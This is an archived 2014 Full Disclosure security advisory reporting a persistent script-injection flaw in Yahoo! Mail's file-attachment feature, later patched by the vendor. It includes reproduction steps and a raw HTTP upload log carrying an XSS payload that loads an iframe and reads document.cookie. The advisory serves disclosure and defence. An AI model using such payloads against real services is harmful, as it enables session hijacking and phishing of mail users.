[FD] Yahoo! Bug Bounty #30 YM - Application Side Mail Encoding (File Attachment) Vulnerability
Vulnerability Lab <[email protected]> Thu, 10 Jul 2014 14:52:43 +0200
| Newsgroups | gmane.comp.security.fulldisclosure,gmane.comp.security.full-disclosure |
|---|---|
| Message-ID | <[email protected]> |
Document Title:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment)=
Vulnerability
References (Source):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://www.vulnerability-lab.com/get_content.php?id=3D1137
Release Date:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2014-07-08
Vulnerability Laboratory ID (VL-ID):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
1137
Common Vulnerability Scoring System:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
5.3
Product & Service Introduction:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D
Yahoo! Inc. is an American multinational internet corporation headquartered=
in Sunnyvale, California. It is widely =
known for its web portal, search engine Yahoo! Search, and related services=
, including Yahoo! Directory, Yahoo! Mail, =
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, on=
line mapping, video sharing, fantasy sports =
and its social media website. It is one of the most popular sites in the Un=
ited States. According to news sources, =
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself=
claims it attracts `more than half a =
billion consumers every month in more than 30 languages.
(Copy of the Vendor Homepage: http://www.yahoo.com )
Abstract Advisory Information:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D
The Vulnerability-Laboratory Research Team has discovered a persistent inpu=
t validation vulnerability in the official Yahoo! Mail Service web-applicat=
ion.
Vulnerability Disclosure Timeline:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D
2013-11-08: Researcher Notification & Coordination (Ateeq ur Rehman Khan - =
Core Research Team)
2013-11-09: Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-02-18: Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty Pro=
gram)
2014-06-01: Vendor Fix/Patch (Yahoo! Developer Team - Reward: HackerOne Pro=
gram)
2014-07-08: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Published
Affected Product(s):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Yahoo!
Product: Yahoo! Mail - Web Application & API 2013 Q3
Exploitation Technique:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Remote
Severity Level:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Medium
Technical Details & Description:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D
A persistent script code inject web vulnerability has been discovered in th=
e official Yahoo Mail Service web-application & API. =
The vulnerability affects the Yahoo Mail Mobile Application for iPhone, iPa=
d and iPod touch. The vulnerability allows attackers =
to upload / attach own malicious .html files and send them to other Yahoo u=
sers.
During the testing, it was discovered that using Yahoo mail, it is possible=
to include malicious script code within .html files =
and send them as attachments to other users. It seems that the application =
is not performing proper validation When uploading =
user attached files. Upon viewing these attached files from your iphone/ipa=
d device, the malicious script code gets executed =
directly hence leaving the victims vulnerable to persistent client side att=
acks.
The security risk of the persistent web vulnerability is estimated as mediu=
m with a cvss (common vulnerability scoring system) =
count of 5.3. Exploitation of this vulnerability requires low user interact=
ion. Successful exploitation of this vulnerability =
results in persistent phishing, persistent client side redirects, user sess=
ion hijacking and similar client side attacks.
Request Method(s):
[+] POST
Vulnerable Application(s):
[+] Yahoo! Mail - Web Application
Vulnerable Module(s): =
[+] Compose Mail > File Attachments
Vulnerable Parameter(s):
[+] Attach File
Proof of Concept (PoC):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The persistent input validation web vulnerability can be exploited by remot=
e attackers with low privileged yahoo web application =
account and low user interaction. For security demonstration or to reproduc=
e the vulnerability follow the provided information =
and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Register an yahoo mail account and login to the account system
2. Open the `compose a New Yahoo email` section
3. Click the `attach file` button in the compose mail section
4. Attach the POC.html file provided along with this advisory
5. Send out the email with the malicious test attachment to another yahoo t=
est account =
6. Using your iPad/iPhone device, click on the attachment link of the newly=
received POC email
7. You should now see an iframe with vulnerability labs website proving the=
existence of this vulnerability
8. Successful reproduce of the yahoo mail service vulnerability!
--- PoC Session Logs ---
POST /us.f1624.mail.yahoo.com/ya/upload_with_cred?output=3Dphp&cred=3DEncry=
pted HTTP/1.1
Host: bf1-attach.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Fir=
efox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://us-mg6.mail.yahoo.com/neo/launch?.rand=3D7sd8nun2neu5c
Content-Length: 561
Content-Type: multipart/form-data; boundary=3D---------------------------23=
4701259230567
Origin: http://us-mg6.mail.yahoo.com
Cookie: Hidden
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------234701259230567
Content-Disposition: form-data; name=3D"filename
POC.html
-----------------------------234701259230567
Content-Disposition: form-data; name=3D"filesize"
120
-----------------------------234701259230567
Content-Disposition: form-data; name=3D"Filedata"; filename=3D"POC.html"
Content-Type: text/html
'%3d'>"><iframe src=3D'http://www.vulnerability-lab.com' onmouseover=3Daler=
t(document.cookie)></iframe>/927
"><h1>Testing POC Ateeq
-----------------------------234701259230567
Response:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://us-mg6.mail.yahoo.com
Cache-Control: private
Connection: Keep-Alive
Content-Length: 322
Content-Type: text/xml
Date: Fri, 08 Nov 2013 19:12:53 GMT
P3P: policyref=3D"http://info.yahoo.com/w3c/p3p.xml", CP=3D"CAO DSP COR CUR=
ADM DEV TAI PSA PSD IVAi =
IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN CO=
M NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Server: HTTP/1.1 UserFiberFramework/1.0 =
Vary: Accept-Encoding
Via: HTTP/1.1 r03.ycpi.ac4.yahoo.net UserFiberFramework/1.0 =
<?xml version=3D"1.0" encoding=3D"UTF-8"?><Response> <attachment> <code=
>uploadAVNoVirus</code> =
<id>e2fd91b75b55018624eef056c5913b0f</id> <name>POC.html</name> <type=
>text/html</type> =
<size>126</size> </attachment></Response><!-- web162405.mail.bf1.yahoo.com=
compressed/chunked Fri Nov 8 11:12:53 PST 2013
Reference(s):
https://mail.yahoo.com
Solution - Fix & Patch:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Proper security controls should be implemented/enforced in the file attachm=
ent module to validate inputs and to persistent script code executions.
Security Risk:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The security risk of persistent input validation web vulnerability in the y=
ahoo mail service application is estimated as medium.
Credits & Authors:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evol=
ution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The information provided in this advisory is provided as it is without any =
warranty. Vulnerability Lab disclaims all warranties, either =
expressed or implied, including the warranties of merchantability and capab=
ility for a particular purpose. Vulnerability-Lab or its suppliers =
are not liable in any case of damage, including direct, indirect, incidenta=
l, consequential loss of business profits or special damages, even =
if Vulnerability-Lab or its suppliers have been advised of the possibility =
of such damages. Some states do not allow the exclusion or limitation =
of liability for consequential or incidental damages so the foregoing limit=
ation may not apply. We do not approve or encourage anybody to break =
any vendor licenses, policies, deface websites, hack into databases or trad=
e with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - ww=
w.evolution-sec.com
Contact: [email protected] - [email protected] =
- admin-sRlC7LJHFRmvt2SHZzvQTwC/[email protected]
Section: dev.vulnerability-db.com - forum.vulnerability-db.com =
- magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab =
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rs=
s_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list=
-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file=
requires authorization from Vulnerability Laboratory. Permission to =
electronically redistribute this alert in its unmodified form is granted. A=
ll other rights, including the use of other media, are reserved by =
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advi=
sories, source code, videos and other information on this website =
is trademark of vulnerability-lab team & the specific authors or managers. =
To record, list (feed), modify, use or edit our material contact =
([email protected] or [email protected]) to get a pe=
rmission.
Copyright =A9 2014 | Vulnerability Laboratory [Evolution Security]
-- =
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: [email protected]
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/